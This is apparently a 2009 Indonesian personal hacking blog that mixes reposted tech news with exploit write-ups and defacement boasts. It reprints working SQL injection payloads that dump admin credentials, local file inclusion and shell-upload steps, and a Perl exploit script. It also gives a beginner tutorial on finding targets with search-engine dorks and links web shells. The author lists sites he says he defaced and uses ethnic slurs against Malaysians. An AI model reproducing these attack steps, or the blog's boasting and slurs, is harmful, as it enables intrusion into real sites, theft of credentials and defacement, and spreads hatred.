Berita Lokal Mendunia via Twitter di 2009

Peristiwa yang terjadi di Indonesia tidak hanya mendunia lewat bantuan media asing. Mikroblogging Twitter bisa jadi telah berperan cukup besar dalam memperkenalkan Indonesia, baik maupun buruk, ke dunia internasional.

Meski belum diketahui berapa banyak pengguna internet di Indonesia yang tergabung menjadi bagian dari Twitter, namun tercatat, tema tentang peristiwa di Indonesia sempat beberapa kali muncul dalam 10 besar trending topics. Ini merupakan bukti jika pengguna Twitter di Indonesia cukup banyak.

Trending Topics sendiri muncul ketika Twitter mencoba untuk berbenah dengan menggelontorkan fitur-fitur baru. Fitur lainnya yang masuk bersamaan dengan Trending Topics adalah fitur ReTweet dan List. Namun berdasarkan fungsi dan kegunaannya, fitur ReTweet paling banyak digunakan. Sedangkan Trending Topics hanya cukup menarik perhatian.

Fitur Trending Topics merupakan kumpulan tema terhangat yang sedang menjadi pembicaraan para pengguna Twitter. Pengguna Twitter yang kebanyakan berasal dari mancanegara membuat kontribusi topics yang paling sering muncul memang berasal dari dunia internasional. Meski sesekali. Indonesia sempat berkontribusi dalam Trending Topics ini, khususnya jika ada peristiwa yang cukup menarik dibicarakan atau diperdebatkan di kalangan pengguna Twitter tanah air.

Menurut data TwitterHolic, mereka memperkirakan ada lebih dari 10.000 pengguna Twitter yang berasal dari Indonesia. TwitterHolic sendiri merupakan situs statistik yang memberikan informasi mengenai pengguna twitter teraktif dan terbanyak di Indonesia. Situs statistik yang tidak memiliki afiliasi langsung dengan twitter ini mendeteksi ada sekira 10.662 pengguna Twitter di Indonesia.

Berikut ini beberapa trending topics lokal yang berhasil memeriahkan Twitter,

#Bomb Jakarta
Peristiwa pengeboman yang terjadi di Jakarta cukup membuat heboh pengguna Twitter. Peristiwa yang berlangsung pada 17 Juli lalu ini sempat masuk dalam 5 besar trending topics. Jika Ritz Carlton masuk menduduki posisi 4 Trending Topics di Twitter, topik dengan istilah Jakarta berhasil menduduki posisi kedua di top trending topics. Bahkan, topik ini mengalahkan perbincangan mengenai Michael Jackson yang saat ini menduduki posisi 6 trending topics di Twitter. Serta mengalahkan topik mengenai pemilu di Iran. Namun topik mengenai Harry Potter masih menjadi perbincangan hangat dan mendominasi Tweet di Twitter.

#MbahSurip
Kematian Mbah Surip langsung mendunia di Twitter. Bahkan, topik mengenai Mbah Surip menjadi trending topik nomor 1 mengalahkan Bill Clinton dan menyingkirkan Michael Jackson. Mbah Surip merupakan penyanyi yang cukup fenomenal melalui lagunya yang bertajuk 'Tak Gendong'. Entah seberapa kuat fenomena Mbah Surip sehingga mampu mendunia di Twitter. Padahal Indonesia bukanlah pengguna Twitter terbesar. Apalagi, lagu Mbah Surip sendiri belum pernah diperdengarkan maupun disadur ke dalam bahasa Inggris. Kematian Mbah Surip sendiri terjadi pada 4 Agustus lalu.

#Batik
Twitter menampilkan dua tema berkaitan dengan batik, yaitu 'Happy Batik Day' dan 'Batik'. Keduanya masuk dalam 10 besar trending topic. Jika 'Happy Batik Day' berada di posisi 7 maka kata 'Batik' saja masih menempati posisi 9 di trending topic Twitter. Rupanya 'Happy Batik Day' lebih mendunia ketimbang 'Batik'. Buktinya pengguna Twitter dari luar Indonesia juga mendukung kebudayaan asli Indonesia ini dengan menyematkan kata 'Happy Batik Day' dalam setiap tweet mereka. Sedangkan pengguna tweet 'Batik' kebanyakan berasal dari dalam Indonesia. Trending topics ini berlangsung pada 2 Oktober lalu, sesaat setelah Unesco meresmikan Batik sebagai warisan budaya Indonesia.

#IndonesiaUnite
Dua ledakan bom di Jakarta memang sempat menduduki trending topics di Twitter. Namun tak lama, trend tersebut berganti menjadi #IndonesiaUnite. Gerakan yang berupaya menyadarkan Indonesia agar tidak takut terhadap teror bom ini sempat menduduki posisi 1 dalam daftar Trending Topics.

#BukaSemangatBaru
Coin A Chance, sebuah gerakan sosial yang mengumpulkan 'recehan' atau uang logam untuk membantu anak-anak putus sekolah baru saja meluncurkan sebuah program baru, 'Coin-Collecting Tweets' (CCT). Program CCT hadir atas kerjasama antara Coin A Chance dengan perusahaan minuman ringan Coca Cola. Melalui CCT, para donatur yang berada di luar Jakarta bisa menyalurkan uang receh mereka dengan memasang hashtag #bukasemangatbaru di Twitter. Satu hashtag akan dihargai sekira Rp100.

#Gempa
Di dalam situs mikroblogging tersebut, setidaknya ada tiga kata kunci yang masuk di dalam daftar paling populer tersebut, yaitu 'Jakarta', 'Gempa' dan 'Earthquake. Dan dari ketiganya, kata Earthquake yang masuk paling atas, dengan menempati posisi ke lima. Kejadian gempa yang berlangsung pada bulan Oktober ini langsung menyita perhatian pengguna Twitter.

#IndonesiaBanget
Pada bulan November, sebuah hashtag secara tidak sengaja terbentuk. Hashtag dengan tajuk #IndonesiaBanget itu menunjukkan keunikan-keunikan Indonesia. Meski tidak sampai menduduki posisi satu namun #IndonesiaBanget cukup puas bertengger di posisi dua. Tidak heran. Pasalnya, hashtag tersebut mampu menghasilkan sekira 8500-an tweet dalam kurun 16 menit.

#PendetDance
Terdapat tiga hashtag untuk kategori tari Pendet ini di twitter, yaitu #PendetDance, #PendetIndonesia, dan #Bali. Beruntungnya, masing-masing topik tersebut masuk ke dalam 10 besar trending topics di Twitter. Hashtag ini muncul setelah berita mengenai aksi Malaysia yang mengklaim tari Pendet merupakan budaya negeri Jiran tersebut tersebar melalui sebuah video Visit Malaysia. Sontak, warga Twitter langsung memberitahukan kepada dunia melalui Twitter, dengan cara ini.

#Menculik Miyabi
Oktober silam, film Menculik Miyabi menjadi kontroversi. Pasalnya, film ini benar-benar akan melibatkan bintang porno asal Jepang, Maria Ozawa atau yang lebih dikenal sebagai Miyabi. Meski tidak menduduki posisi teratas, namun hashtag dengan tajuk Menculik Miyabi sempat menduduki posisi 10 besar dalam trending topik di Twitter.

khusus yang diatas gw gw dah nunggu banget filmnya... T.T

Seks, Topik Paling Dicari Anak-Anak di Internet

SAN FRANCISCO - Bimbingan orangtua dalam mendampingi anak untuk mempelajari dunia maya dinilai sangat penting. Pasalnya anak-anak dapat dengan mudah mengakses situs-situs berbau pornografi atau kekerasan di dunia maya.

Berdasarkan temuan perusahaan penyedia solusi keamanan Norton, Seks merupakan topik yang paling sering diburu anak-anak sepanjang tahun 2009. Demikian dilansir AFP, Jumat (18/12/2009).

Norton mengungkapkan, tiga situs yang paling sering diakses anak-anak dan

remaja berusia 18 tahun ke bawah adalah YouTube, Google, dan Facebook. Parahnya lagi kata kunci yang paling sering diburu adalah 'Porn' dan Seks'.

"Orang tua berarti harus semakin meningkatkan pengawasan dan memberikan peringatan kepada anak-anaknya tentang konten yang tak diperuntukan untuk anak-anak," tulis Symantec.

Akses internet tehadap pornografi kebanyak dilakukan oleh anak laki-laki sedangkan anak perempuan lebih banyak menelusuri topik-topik seperti film, berita selebriti, musik dan acara-acara televisi.

Boys' top 25 searches centered on social networking, games, shopping, and "adult terms," according to Norton.

Data ini, menurut Symantec hasil dari pencarian sekira 14,6 pencarian yang dikumpulkan sejak 2 Februari hingga 4 desember 2009.

"Ketika pornografi telah menjadi ancaman, orang tua harus lebih mengawasi anak-anaknya ketika menelusuri konten-konten internet,' ujar Norton Internet safety advocate Marian Merritt.

Melacak Kedatangan Sinterklas Melalui Website

COLORADO - North American Aerospace Defense Command (NORAD) menyediakan layanan khusus untuk memeriahkan kegembiraan Natal bagi anak-anak. Layanan tersebut berupa website khusus untuk melacak keberadaan Sinterklas.

Anak-anak yang tak sabar menanti kedatangan Sinterklas bisa mengetahui update terbaru untuk mengetahui dimana pria berjanggut nan baik hati itu berada.

NORAD mengklaim bahwa mereka mengerahkan semua peralatan canggih untuk membuntuti dan melacak kemana Sinterklas dan rusa-rusanya pergi berkeliling dunia untuk mengantarkan hadiah.

Telegraph, Kamis (24/12/2009) melansir, tradisi melacak keberadaan Sinterklas sudah dilakukan NORAD sejak 1955. NORAD yang saat itu bernama Director of Operations at Continental Air Defense Command (CONAD) menyediakan saluran telepon khusus bagi anak-anak yang menantikan kedatangan Sinterklas.

Kepala CONAD saat itu menginstruksikan stafnya untuk memberikan informasi terbaru mengenai keberadaan dan posisi Sinterklas. Maka sejak saat itu,

ahirlah tradisi melacak keberadaan Sinterklas di Colorado.

Kala itu mereka didorong untuk menelepon nomor hot line yang disediakan CONAD untuk mencari informasi keberadaan Sinterklas. Antusiasme anak-anak yang ingin segera bertemu Sinterklas membuat trafik panggilan telepon CONAD membludak dan bahkan sempat mengalami eror.

Kini jaman telah berganti, teknologi pelacak Sinterklas pun tak lagi menggunakan telepon. Sekarang NORAD menawarkan layanan pelacak Sinterklas tersebut ke anak-anak di seluruh dunia dengan memanfaatkan layanan Google Earth Map. Layanan ini menyediakan informasi dalam tujuh bahasa termasuk bahasa Inggris, Spanyol dan China.3

Untuk meyakinkan anak-anak, NORAD menyebutkan mereka menggunakan teknologi radar dan satelit untuk melacak sinyal cahaya infra merah yang dipancarkan dari hidung merah Rudolph, salah satu rusa kutub yang setia menemani Sinterklas berkeliling membagikan hadiah.

sekarang yang jadi pertanyaan gw pa bisa ya sinterklas ntuh dilacak ???????

Netter Habiskan Waktu Online 13 Jam Seminggu

WASHINGTON - Hasil jajak pendapat terbaru di AS menyebutkan rata-rata pengguna internet atau netter menghabiskan waktu sekira 13 jam per minggu untuk berselancar di dunia maya.

Jajak pendapat interaktif yang diadakan lembaga survei Harris menemukan sekira 80 persen orang dewasa di AS selalu online dimana pun mereka berada. Data statistik menunjukkan jumlah jam yang bervariasi. Namun secara rata-rata, umumnya para pengguna internet tersebut menghabiskan waktu 13 jam setiap minggunya.

Selain jumlah rata-rata, diketahui ada 20 persen pengguna yang online selama dua jam atau kurang dalam satu minggu. Ada pula pengguna yang betah online selama 24 jam atau lebih, kelompok ini menempati porsi sekira 14 persen. Demikian keterangan yang dikutip dari CNet, Senin (28/12/2009).

urvei Harris pun menemukan rata-rata jumlah jam yang dihabiskan untuk aktivitas online setiap minggunya terus bertumbuh dari tahun ke tahun. Melesat menjadi tujuh jam dari tahun 1999 ke 2002, delapan hingga sembilan jam dari 2003 ke 2006, dan mencapai 11 jam di tahun 2007.

Level tertinggi mencapai puncaknya pada hasil survei bulan Oktober 2008 mencapai 13 hingga 14 jam. Kelompok usia yang paling banyak menghabiskan waktu di internet setiap minggunya terdiri dari orang-orang dewsa berusia 30 hingga 39 tahun. Saat ini total pengguna internet dewasa di AS adalah 184 juta, atau sekira 80 persen dari total populasi.

Data statistik ini kurang lebih hampir sama dengan data tahun 2008 namun merupakan lompatan angka yang sangat besar jika dibandingkan dengan data pada 1999. (rah)

wah kalo menurut saya biasa saya malah lebih dari 13 jam.. hwhehhehehe...

raphid checker online

nah teman2 mungkin dah tau sebagian cara menggunakan tools yang satu ini...
kita liat ja sebelah kanan kita nie..

disitu tinggal taruh password dari rapid pa bisa ato gak....

ya gw juga kurang ngerti pake nya ya pokoknya enjoylah....
wkakkaka :D

Sql Scan Online

hahahahah..
memang tools sekarang makin keren ja contohnya tanpa harus cape cari target sql tinggal kita taruh ja disini ..


ntr semua hasil scan web yang dia searching pasti dapat tapi kelemahannya yaitu hanya beberapa saja yang dapat tergantung dari berapa nomor id yang kamu masukan jadinya silahkan coba dont wory gak davirusnya kok...

kalo mau jadi hacker ya harus berusaha ..
kalo menurut gw lebih enak nginjek manually.. :P

Aurora CMS Remote SQL Injection Exploit

# Title: Aurora CMS Remote SQL Injection Exploit
# EDB-ID: 10609
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sora
# Published: 2009-12-22
# Verified: no


# Download

Exploit

# Download N/A

view source
print?
# Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
# Date: December 22nd, 2009
# Author: Sora
# Software Link: http://www.auroracms.com.au/
# Version: 1.0, 2.0, and 3.0
# Tested on: Windows and Linux
------------------------------------------------
> Aurora CMS Remote SQL Injection Exploit
> Vulnerability in: content.php
> Found and disclosed by: Sora
> Contact: vhr95zw [at] hotmail.com

> Google dork: "Aurora CMS"

Aurora CMS suffers a remote SQL injection exploit in content.php.

The type is UNION statement SQL injection.

# Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!

Turut Berduka Cita.

walaupun saya terlambat tahu atas berita ini saya mewakili keluarga besar IDC tarakan mengucapkan Turut berduka cita sedalam-dalamnya atas meninggalnya nenek dari saudara kita don tukulesto..
semoga amal dan ibadah nya diterima disisinya..
Amien...

Stop Korupsi

PROKLAMASI! (2009)

Kami Bangsa Indonesia, dengan Ini Menyatakan Kemerdekaannya Dari KORUPSI dan KESEWENANG-WENANGAN.
Hal-hal yang menyangkut Pemberhentian Secara tidak terhormat Pejabat-Pejabat yang terlibat/terkait/Tersangkut Pemufakatan Jahat, Berkomplot Dan KKN
Dilakukan dengan cara Tanpa Pandang Bulu Dan Dalam tempo yang sesingkat-singkatnya tanpa Anarki Dan Tanpa Basa-basi.

Jakarta, 9 Desember 2009
Atas nama Bangsa Indonesia

from :

antisecradio

Active PHP Bookmarks v1.3 SQL Injection Vulnerability

# Title: Active PHP Bookmarks v1.3 SQL Injection Vulnerability
# EDB-ID: 10597
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-22
# Verified: yes
# Download

Exploit Code

# Download N/A

view source
print?
# Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-21
=============================================================
~ Author : Mr.Elgaarh
~ Email : scan_cmpu@yahoo.com
~ Home : http://securityreason.com/
=============================================================

Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=

./Exploit:

first search for the admin username :
ex : http://server/path/view_group.php?id=-4

ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--

admin panel path : http://server/path/cookie_auth.php?action=cookie_login

---------------------------------------------------------------------------------------------------------------------------
Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -

mypage v0.4 Local File Inclusion Vulnerability

# Title: mypage v0.4 Local File Inclusion Vulnerability
# EDB-ID: 10600
# CVE-ID: ()
# OSVDB-ID: ()
# Author: BAYBORA
# Published: 2009-12-22
# Verified: yes
# Download

Exploit Code

# Download N/A

#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}

Mini File Host v1.5 Remote File Upload Vulnerability

# Title: Mini File Host v1.5 Remote File Upload Vulnerability
# EDB-ID: 10601
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Z
# Published: 2009-12-22
# Verified: no
# Download

Exploit Code

# Download N/A

=====================================================================

=========
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


=====================================================================

=========
[»] ~ Note : This vulnerability allows you to upload if the "storage" file isn't protected with a htaccess file or

anything else
=====================================================================

=========
[»] Mini File Host v1.5 Remote File Upload Vulnerability
=====================================================================

=========

[»] Script: [ Mini File Host ]
[»] Language: [ PHP ]
[»] Site page: [ Mini File Host v1.5 ]
[»] Download: [ http://www.hotscripts.com/listing/mini-file-host/ ]
[»] Founder: [ Mr.Z ]
[»] Greetz to: [ all muslims , ViRuSMaN ]

###########################################################################

===[ Exploit ]===

Click on "Browse" and select your php shell
Click Upload
After it finishs , you will see this meassage (

Your file was uploaded!

Your download link

http://server/script/download.php?file=328shell.php

)

Copy the new Name of the shell "328shell.php"

Now Go to this Url

http://server/script/storage/328shell.php

if "Storage" wasn't protected your shell will open


Author: Mr.Z <-

###########################################################################

# Title: Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability
# EDB-ID: 10604
# CVE-ID: ()
# OSVDB-ID: ()
# Author: jgaliana
# Published: 2009-12-22
# Verified: no
# Download

Exploit Code

# Download N/A

view source
print?
# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
# sanitize user-supplied input.

#An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

# Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 "); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]");
my $res = $ua->request($req);

if ($res->is_success) {
print $res->content;
} else {
print "Error: " .$res->status_line, "\n";
}

#$ perl simple.pl example.com /blog /etc/passwd |head -1
#root:*:0:0:root:/root:/bin/bash

from :

Offensive Security

wahhh.. capenya edit blog padahal dah lama banget gak update blog sekarang saatnya kembali keasal ku dunia maya dunia yang penuh dengan peperangan yang menurut gw asyik banget,,

gw gak tahan lagi buat cari web yang vuln nie... tunggu kedatangan q :D

Hacking with php injection with patching site

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.


° BAGAIMANA BISA TERJADI? :D

———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel seperti ini:

…
include($my_ms[”root”].’/error.php’);
…

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
————-

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, etc..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos!

° SISTEM OPERASI APA YANG KEBAL?
——————————

Saya teringat permainan C&C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan “NO SYSTEMS IS SAFE!”. Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
————————-

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
——
from : www.webdeessaint.com

perang cyber comeback again with malaysia

Semalem gw dikirimin hasil chat antara abang gw dengan salah seorang anggota Alien Crew ( Haxor Malayshit). Isinya mereka tidak terima dengan website yg di deface oleh hacker Indonesia dan mereka mengancam akan mendeface 1000 situs Indonesia. Dan mereka akan memulai aksinya itu pada tanggal 20 Februari 2009.

Berikut hasil chatingan nya dengan Alien Crew ( ockgen ) :


ockgen: assalamualaikum wahai sahabt ku

punk_dos: walaikum salam

ockgen: aku dengar kamu banyak hack situs di malaysia..benarkah?

punk_dos: ?

ockgen: benar atau gak?

punk_dos: ??

ockgen: slmat malam.assalamulaikum

punk_dos: maaf anda siapa?

punk_dos: ada perlu apa?

ockgen: ini kali terakhir aku tanya, kamukah yg membuat deface kepada situs2 di malaysia?

punk_dos: anda siapa?

ockgen: Alien crew

punk_dos: lalu?

ockgen: http://www.hackermalaysia.net/

ockgen: saya mahu tanya sahaja

ockgen: btolkan kamu?

punk_dos: apa hak anda bertanya seperti itu terhadap saya?

ockgen: saya mendapat khabar bahawa kamu defacer yg famous di indonesia.

ockgen: yg slalu menggangu situs2 kami

ockgen: saya ingin bertanya

ockgen: kalo kamu tak melakukan gak apa.. kami cuma mahu tahu

punk_dos: lalu?

ockgen: adakah kamu?

punk_dos: silahkan bertanya misterdeessaint@yahoo.com

ockgen: just u and me...aku saja ingin tahu...bukan apa2...sapa itu?

ockgen: aku tanya kamu....adakah kamu hebat?

ockgen: kamu tidak mahu menjawab?

punk_dos: anda telah mengganggu waktu kerja saya, dan membuang gaji kerja saya

ockgen: ok........ bagi tahu kepada bos kamu, mulai 20/02/09, pihak kami akan melakukan cybernatic war dengan negara kami.. sasaran kami kali ini adalah sebanyak 1000 situs. khabarkan kepada bos-bos mu itu. ASSALAMUALAIKUM

punk_dos: anda mengamcam

punk_dos: ?

Ocktula Heepgen: ini untuk kamu.. http://klikpembantu.com/ ...tunggu dan lihat aja pada 20/02/2009, 1000 situs indo akan jadi sasaran.....lo cuma dapat hack website yang bodoh sahaja, yang semua orang dapat tembusi.... kalo lo hebat, lo hack website dibawah jagaan gue, http://www.psmza.edu.my/administrator/ ...joomla bukan sebarang joomla, joomla dikawal oleh gue, kalo lo hebat, ayo tenbusi situs ini..... gue semua cabar hacker indon untuk hack situs ini, tapi, sorang pun tidak dapat masuk...... wait and see... " we got your root"....

punk_dos: gila2


Rupanya si haxor malayshit tidak terima dengan beberapa situs yg di deface hacker Indonesia. Atau mungkin si haxor Malayshit ini berang karena ada situs bikinan dia jadi sasaran deface hacker Indonesia. Tapi sebelum nya Alien Crew telah mendeface ribuan situs Indonesia dan itu yg membuat hacker Indonesia menjadi berang dan mulai membabat situs² malayshit.
Dan perang sampai saat ini masih saja berlangsung tanpa tau kejelasan.....

tapi saya percaya pada hacker indonesia daripada hacker malaysia......

mereka hanya bermulut besar......

tetapi tidak menghasilkan apa" .....

kalo mau tau liat saja forum mereka.....

ini alamat forum hacker negara pencuri (ganyang malaysia )...

http:\\www.hm.org\

jalan2 keportugal.....

gini seritanya....
saya sedang jalan2 ke web portugal asal negara cristiano ronaldo...
eh saya kebablasan hancurin situs orang ...
mau tau berapa situs saya dapat.....


ne dia......

http://www.alcides.eu/

http://virtualazores.net/

http://fonsecamacedo.com/

http://futurinfor.pt/index.php

http://garajau.com/

http://hotelocidental.com/

http://hermano-rego.com/index.php

http://iurrentacar.com/

http://www.jcosta.com.pt/

http://linuxazores.org/

http://pousadarosa.com/

http://adeliacor.org/index2.html

http://casadascalhetas.com/

http://ctsm.org/

http://etvieira.com.pt

mirrornya:

http://www.evilc0der.com/mirror/4870/

http://www.evilc0der.com/mirror/4880/

http://www.evilc0der.com/mirror/4881/

http://www.evilc0der.com/mirror/4883/

http://www.evilc0der.com/mirror/4885/

http://www.evilc0der.com/mirror/4892/

http://www.evilc0der.com/mirror/4896/

http://www.evilc0der.com/mirror/4897/

http://www.evilc0der.com/mirror/4898/

http://www.evilc0der.com/mirror/4899/

http://www.evilc0der.com/mirror/4902/

http://www.evilc0der.com/mirror/4906/

http://www.evilc0der.com/mirror/4909/

http://www.evilc0der.com/mirror/4910/

http://www.evilc0der.com/mirror/4916/

http://www.evilc0der.com/mirror/4922/

nah itu dia web yang kena deface....
gak tau kenapa saya jadi ketagihan.....
tapi enak juga jumping mode on.......

bwt teman2 yang mau belajar ikut ja diforum ini ...

http:indonesiacoder.forumotion.com

kalo gak disini

http:www.defacer.isgreat.org

bwt teman2 join ja ya.......

ditunggu kehadirannya....

Saya berhasil menghajar situs negara pencuri

situs nie memang sangat membuat saya jengkel serta negara tersebut juga....
saya sangat tidak menyukai negara yang mencuri kebudayaan negara lain......
kalo mereka mau y buat sendiri donk kebudayaan jangan bisanya copy paste ja....


lagian bahasa malayshit juga berantakan........
pokoknya bahasa mereka tuh sama kaya bahasa anjing......
bahasa hewan yang gak bisa dimengerti sama sekali....

nie dia webnya:

www.malaysiansia.com

saya sangat membenci semua situs negara ini.....
pokoknya samapai akhir saya tetap membenci negara pencuri....

malayshit setan loe............

Beberapa situs yang berhasil kena hack ....

nie webnya :

http://skrfid.com/

hanya dengan menggunakan sistem token.....
tapi kalo kita pake sistem token ini kita harus sabar.....
dan jangan gampang menyerah....

loe ko jadi banyak omong sc....
oh ya nie hasilnya ...
cory ya kebanyakan ngoceh... ^_^







yang dua diatas adlah bekas defacean saya serta halamn admin nya
nie webnya:http://www.whisperandguapo.com/nuke/index.php

cory ya kalo dah dipatch

tutoral hacking tuk pemula ^_^

Level : Pemula :D :$

Hampir semua para pemula yang pingin hacking web atau deface web, menggunakan jasa layanan
seacrh engine site google alias mengandalkan dork, xixixixixixi. Pokoknya ada suka dan duka
disaat pencarian target, xixixixixixi. Sukanya dapat tuh target dan dukanya gak dapat sama
sekali, wuakakakakakaka, dan tak lupa juga para pemula yang mau belajar hacking, gak lepas
dari sisi site milw0rm. Disini aku akan melampirkan beberapa teknik hacking web yang masih
berlaku dan bisa digunakan.



Hacking pada Ourspace 2.0.9
---------------------------
Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343. Ok kita dah ambil toh. Sekarang kita akan mencoba

1. Buka google, trus ketik inurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di hack
contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul kalimat upload files

5. Isi deh atau upload file html anda.




Hacking Remote File Inclusion
-----------------------------
Disini saya akan menguraikan dengan singkat dari teknik hacking RFI.

1. Buka google trus ketik "Php Blue Dragon" pada search enginenya

2. Setelah itu cari situs yang mau di hack
Contohnya : http://www.komix91.ovh.org (site dikiri, da lama aku hack tapi lupa bugnya yang mana, hehehehehehe)
Ngomong-ngomong karena aku da lupa bug mana tuh, lebih baik kalian cari aja di http://www.milw0rm.com
Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
Oke, selanjutnya kalian coba aja sendiri ya. Ngomong-ngomong kalau ada kata evil code pada bug situ itu
maksudnya web shell. Kalau gak ada web shell pake punya aku aja. Itung-itung amal, hehehehehehehe
- http://www.geocities.com/engel_hacking/r57.txt?
- http://www.geocities.com/engel_hacking/c99.txt?
- http://www.geocities.com/engel_hacking/Ekin0x.txt?
Well, jangan terpengaruh di link web shell aku yang ada kata engel_hacking, aku bukan malaikat hacking, tapi
ngaku-ngaku malaikat hacking, wuakakakakakakakaka. Padahal gak hebat amat. Cuma Internet Holic doank. Hehehe

3. Selamat mencoba ya. Semoga sukses.




Hacking SQL Injection
---------------------
Disini saya akan menguraikan singkat teknik hacking SQL injection. Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh disini saya mengambil BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk me-
ncari bug sql pada web.

2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita injeck. Contoh :
